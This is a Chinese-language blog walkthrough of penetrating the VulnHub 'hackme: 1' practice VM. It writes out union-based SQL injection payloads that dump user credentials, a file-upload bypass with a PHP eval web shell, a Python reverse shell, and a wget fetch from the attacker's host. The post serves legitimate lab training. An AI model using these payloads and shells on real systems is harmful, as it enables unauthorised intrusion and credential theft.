hackme-1靶机渗透详解

已于 2023-06-12 10:11:27 修改
阅读量510 收藏 3
点赞数
分类专栏: 靶机练习 文章标签: 安全 运维 网络
于 2023-06-12 10:11:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47372600/article/details/131163188
版权
本文详细介绍了如何对一个名为HackMe的初学者级别靶机进行渗透测试。首先进行了信息收集,包括主机发现、端口扫描和目录扫描。接着,通过SQL注入漏洞找到管理员账户和密码。然后,利用文件上传漏洞上传图片马并建立反弹shell。最后,通过提权操作进一步控制系统,重点讨论了SQL注入和文件上传漏洞的利用技巧。
摘要由CSDN通过智能技术生成

靶机描述

靶机基本信息:

链接 hackme: 1 ~ VulnHubhackme: 1, made by x4bx54. Download & walkthrough links are available.https://www.vulnhub.com/entry/hackme-1,330/

“hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。

环境搭建

1、下载并导入靶机
打开vmware–文件–打开–hackme.ova
d664b39f3b332512902bc25873efae38.png
2、启动靶机
点击 ▶靶机,开启成功
3e227d20652cd863f63a23f575ee83ec.png

靶机渗透

一、信息收集

1、主机发现

arp-scan -l            #扫描同网段下存活主机

061df3686a4cc7c771013b59dcfa1d7b.png
2、扫描端口

nmap -T4 -sV -O -p 22,80 192.168.31.116

52710a4be6d45ef232f9237c483918be.png
3、扫描目录

dirsearch  -u 192.168.31.116

image.png

4、网站指纹识别 whatweb http://192.168.31.116
10454134ae1e5101815e530cd6798a43.png

二、漏洞挖掘

SQL注入

1、登录主页发现登录页面,而且还可以注册用户
e5b072bbe2c8f4e90456625fb769b77f.png
2、点击 Sign up now 注册用户admin 密码123456
bb248f423f028498e24043e6060ed85f.png
3、登录admin用户 单击search可以进行查看到很多的书名
9f78f80605ee081eb1f022f3730eea4e.png
4、验证sql注入

Windows OS' and 1=1#

4cdbddee4a69f19656086503d8ea362d.png

Windows OS' and 1=2#

f3abd4564cf842955e5c522fc1543fc8.png
:::info
由以上验证出此处存在字符型(单引号)sql注入
:::
5、判断字段数

Windows OS' order by 3#
Windows OS' order by 4#

edb6eca67110e8c4d81ad39c6afcf30c.png

9a1d5967d01f6507b755517cd14d5dfd.png

:::info
判断出来字段数是3个
:::

6、判断显示位置

-1' union select 1,2,3#

ab91fa264e1f8d096498824a1f114f4c.png

7、查看当前数据库位置

-1' union select database(),2,3#

bb0cf5a0d89b9c94cb544d4e0c7eb6fb.png

8、查看webapphacking库所有的表

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

9b29816783565cbb5fe7319b39d1b2d9.png

9、查看users表中所有的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

6b3e1f702941daa128d1b524f2d3b0e2.png

10、查看表中user,password字段数据

-1' union select group_concat(user),group_concat(pasword),3 from users#

e2ef189f12f6844c39818635c5f8576c.png

11、将得到密码进行MD5解密
2ad2cc9634573cb54f414631b1d1cfb2.png

文件上传漏洞

1、使用superadmin用户登录 密码:Uncrackable
发现文件上传点
86ecf515cf68a4335560d50d97eec2bf.png
2、上传phpinfo()进行验证

制作假图片头 
GIF89a<?php phpinfo(); ?>

b43cbd6f76d6dd6e71e820c84a097afe.png

上传前先开启burp抓包
7c1f127f0cd83194f3951c1a046ddf7d.png
3、拦截-修改后缀,我们可以从回包中看出文件已将上传至文件夹
d21a5ae33bf30e175c6109cdf6a610fb.png
4、查看你目录扫描出的路径 http://192.168.31.116/uploads/phpinfo.php
d96ead6554fb7f3ac00f93e104b986a6.png
:::info
该上传点存在文件上传漏洞,并且假图片头与图片马均可以
:::

三、漏洞利用

1、制作图片马

 <?php @eval($_POST[shell]); ?>

4903b7ca61b34ad3b42f8dd8d8040461.png
2、同上面上传phpinfo.jpg一样,上传图片马
抓包–修改后缀–发送,可以看出上传成功
343ff5261b37bfc677de1a898a80a949.png
3、访问上传的图片马 http://192.168.31.116/uploads/b.php
fde68df6baddbbe5fe15e610a7538009.png
4、蚁剑连接成功
6e1a73581dea47f9fc7f1f9e712fb8c4.png
5、上传反弹shell脚本
将反弹shell放在网站根目录下,开启http服务 service apache2 start

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.31.100",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

32df930fcdabac8842e2ba0b8b41a97f.png
6、在蚁剑终端上下载 wget http://192.168.31.100/shell.py
a99f9cc326e167c46db23a88f36e7bf1.png
7、kali监听1234端口
c24c0cd89bd3b553a397bb971754e3cb.png
8、运行 python shell.py
b481d5e121ff18d50f15634e6f83f010.png
9、反弹shell成功
3ade0f10126ed4c65b27d9b868fbe1e1.png

四、 提权

1、识别所存在的用户 cat /etc/passwd | grep /bin/bash
04e30c4e6457df2831b35e46cdffe8b3.png
2、在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件
c3a03ef1309a105ea7f0ba18f814e1a3.png

总结

此靶机重点在于SQL注入,爆出管理员用户及密码

BearSec
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HACKME:1靶机
JKding123的博客
10-22 971
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6541
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
hackme靶场/靶机练习
weixin_69602647的博客
07-29 210
hackme靶场练习
hackerme-靶机渗透
weixin_53736204的博客
07-29 312
靶场搭建下载好双击写好文件名路径。
[hackme]靶机复现漏洞详解!!
最新发布
muyuchen110的博客
07-29 329
首先虚拟机建一个hackme靶机切换nat模式 然后kali扫描自己全端口nmap -sV ip段 0/24扫描出ip进行访问发现是个登录页面可以注册先注册然后登录发现是搜索框,我们直接用搜索型的sql注入。
Hackme靶机渗透
m0_50584370的博客
06-01 243
hackme靶机渗透
靶机渗透HACKME: 1
weixin_47443077的博客
06-20 274
靶机渗透HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 文章目录【靶机渗透HACKME: 10x01靶机介绍1. 详情2. 描述0x02环境搭建1. 下载靶机2. 创建靶机3. 开启靶机0x03靶机渗透1. 主机发现2. 端口扫描3. 服务扫描4. web信息收集0x04漏洞利用1.SQL注入2.文件上传3.反弹shell4.提权 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1
hackme-1初级渗透测试
jrdh的博客
11-26 1696
Hackme-1环境搭建1. 详情2. 描述一:信息收集0x01主机发现端口扫描服务扫描服务器指纹信息查询网站目录爆破二:漏洞发现创建用户SQL注入MD5解密文件上传漏洞漏洞验证三:漏洞利用反弹shell法一: 一句话木马四:提权 环境搭建 测试机:kali:192.168.10.153 靶机hackme-1:192.168.10.155 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初
Hackme1
追求卓越,技术流~
01-12 2104
文章目录前言一、搭建靶场环境二、实战2.1信息收集2.1.1网络扫描2.1.2查看靶机开放的端口22段口分析80端口分析2.2SQL注入2.2.1验证是否含有SQL注入漏洞2.2.2sqlmap注入攻击2.3文件上传漏洞2.4kali监听2.5权力提升总结 前言 学习网络安全技术,我认为:主要是在注重实战。 实践是检验真理的唯一标准 接下来主要围绕靶机的攻击进程来学习网络安全技术。 一、搭建靶场环境 攻击机kali: IP地址:192.168.247.129 靶机hackme1: IP地址:192.
HACK ME靶机
qq_49101841的博客
10-01 1190
❀本篇关于信息安全实训时靶场训练的操作笔记。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机渗透 HACKME-2 (详细渗透,适合新手渗透
君莫hacker的博客
09-06 3968
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
DC-9靶机渗透详解
xiaocainiao2017的博客
12-07 2868
DC-9靶机 查看dc-9的mac地址 sudo arp-scan -l 找出dc-9的IP地址 sudo nmap -A -p- 10.9.11.26 扫描dc-9端口 访问80端口 查看wappalyzer dirb http://10.9.11.26/ 扫描目录 进入css 点击style.css 进另一个目录includes dirb效果不太好,使用dirmap。 访问http://10.9.11.26/display.php
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1185
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
靶机渗透练习13-hackme1
hirak0的博客
04-15 673
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-1,330/ Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic
红队打靶练习:HACKME: 1
分享
12-18 444
红队打靶练习:HACKME: 1 , 犹如猛虎撕咬般的恐惧感.....
Vulnhub-hackme1
GALi_233的博客
03-06 3366
Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment. ‘hackme’ uses DHCP and in the pos
Hackme-1靶机
zjxxxy的博客
06-12 219
Hackme-1靶场攻略
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值